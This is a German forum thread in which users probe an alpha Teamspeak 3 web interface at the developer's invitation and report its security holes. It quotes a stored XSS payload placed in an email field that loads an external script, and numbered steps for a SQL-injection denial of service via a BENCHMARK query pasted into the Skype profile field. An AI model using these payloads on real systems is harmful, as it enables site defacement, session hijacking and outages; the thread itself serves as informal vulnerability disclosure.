[ALPHA] Teamspeak 3 Webinterface

Quote:

Originally Posted by 0xFADED Du solltest deine Form-Validation echt nochmal überarbeiten. Das alles nur im JavaScript zu machen eröffnet so einiges an Möglichkeiten für Angreifer. Konnte meine email Adresse problemlos zu dem hier ändern: Code: "><script src="//hi.kickassapp.com/kickass.js"></script>@aol.de Aber hey: Wenigstens kann ich jetzt bei dir Space Invaders spielen :D [Only registered and activated users can see links. Click Here To Register...]

Das ist richtg... Danke für den XSS... Habe ihn aber gerade behoben ;).

Und ja ansonsten bin ich gerne bereit die challange anzunehmen. Versucht die Seite zu crashen ;)... Ich bin gespannt

Quote:

Originally Posted by First-Coder Das ist richtg... Danke für den XSS... Habe ihn aber gerade behoben ;). Und ja ansonsten bin ich gerne bereit die challange anzunehmen. Versucht die Seite zu crashen ;)... Ich bin gespannt

Crash erfolgreich.
Hab admin sessions die nicht auslaufen und richtig viel Spass im Panel.

[Only registered and activated users can see links. Click Here To Register...]

[Only registered and activated users can see links. Click Here To Register...]

[Only registered and activated users can see links. Click Here To Register...]

Definiere nicht auslaufen?

Die Rechte aktualsieren sich alle x sekunden von daher laufen die sessions auch nicht aus... daher frage ich

Quote:

Originally Posted by First-Coder Definiere nicht auslaufen? Die Rechte aktualsieren sich alle x sekunden von daher laufen die sessions auch nicht aus... daher frage ich

Bitte WAS?
Dann ist das (abgesehen von den völlig unnötig hohen Permissions) die (bis jetzt) grösste Sicherheitslücke
die im Laufe des Gesprächs in deinem System aufgetaucht ist.

Quote:

Originally Posted by 0xFADED Bitte WAS? Dann ist das (abgesehen von den völlig unnötig hohen Permissions) die (bis jetzt) grösste Sicherheitslücke die im Laufe des Gesprächs in deinem System aufgetaucht ist.

Ich habe die Einstellungen mal wieder ein wenig netter geschrieben und das gant "penis" was ihr reingeschrieben habt gelöscht.

Bis jetzt sieht die Seite nicht gecrasht aus.... :cool:

Quote:

Originally Posted by First-Coder Ich habe die Einstellungen mal wieder ein wenig netter geschrieben und das gant "penis" was ihr reingeschrieben habt gelöscht. Bis jetzt sieht die Seite nicht gecrasht aus.... :cool:

Sicher? Schau dir doch mal die Server-Auslastung an. ;)

Quote:

Originally Posted by Shadow992 Sicher? Schau dir doch mal die Server-Auslastung an. ;)

Da das nicht wirklich mit der Homepage zusammen hängt jap :p. Das kleine Bot Netz was den kleinen vServer floatet ist nicht wirklich schlimm :D. Ich meine die, die es später nutzen haben ja eine protection gegen botkiddies :handsdown:

Quote:

Originally Posted by First-Coder Da das nicht wirklich mit der Homepage zusammen hängt jap :p. Das kleine Bot Netz was den kleinen vServer floatet ist nicht wirklich schlimm :D. Ich meine die, die es später nutzen haben ja eine protection gegen botkiddies :handsdown:

Ich gebs auf, du checkst es auch nicht mehr... Als ob ich ein Botnetz drüberlaufen lassen würde, jeder mit halbwegs Linux/SQL Kentnissen kann dieses Ergebnis reproduzueren, sogar in noch krasser. Und wenn du auch nur einen Funken Ahnung hättest, hättest du mal in die Prozess-Liste geschaut oder in deine HTTP-Logs, dann hättest du gesehen, dass dein Server nicht wegen unmengen an Requests einbricht, sondern wegen Sicherheitslücken, die man easy für allerlei Sachen benutzen kann...

Aber wayne, wir haben dir gesagt wo die Probleme liegen und dich mehr als nur einmal versucht vom Gegenteil zu überzeugen, nämlich davon, dass dein Codealles andere als sicher ist. Wer nicht will, der hat schon und da du mir sowieso ein Profi zu sein scheinst lass ichs mal bleiben. Du machst das schon du Profi.

Wie kann man nur so lernresistent sein...

Edit:
Für alle die sich fragen: Wie?
Einfach folgendes der Reihe nach machen:

0. Auf [Only registered and activated users can see links. Click Here To Register...] navigieren
1. Neuen Account registrieren und einloggen
2. auf "Edit Profile" klicken
3. Folgendes in das "Skype"-Feld pasten:

Quote:

'; SELECT BENCHMARK(9999999999,MD5(RAND()));--

4. Den grünen Haken daneben anklicken.
5. Der Server ist jetzt mit diesem sehr abgespeckten Befehl ca 1-2min down.

Das war aber wirklich mein letzter Satz zu diesem Thema.

Riech ich da etwa SQL-Injection

Quote:

Originally Posted by xEr0r Riech ich da etwa SQL-Injection

Die SQL Injection steht doch schon da ... da musst du nix riechen, einfach nur lesen.

Quote:

Originally Posted by xEr0r Riech ich da etwa SQL-Injection

Scheint mittlerweile großteils ausgebessert, unmengen an XSS-Lücken gibts trotzdem noch, genau so wie Session-Sniffing noch ohne Probleme möglich ist.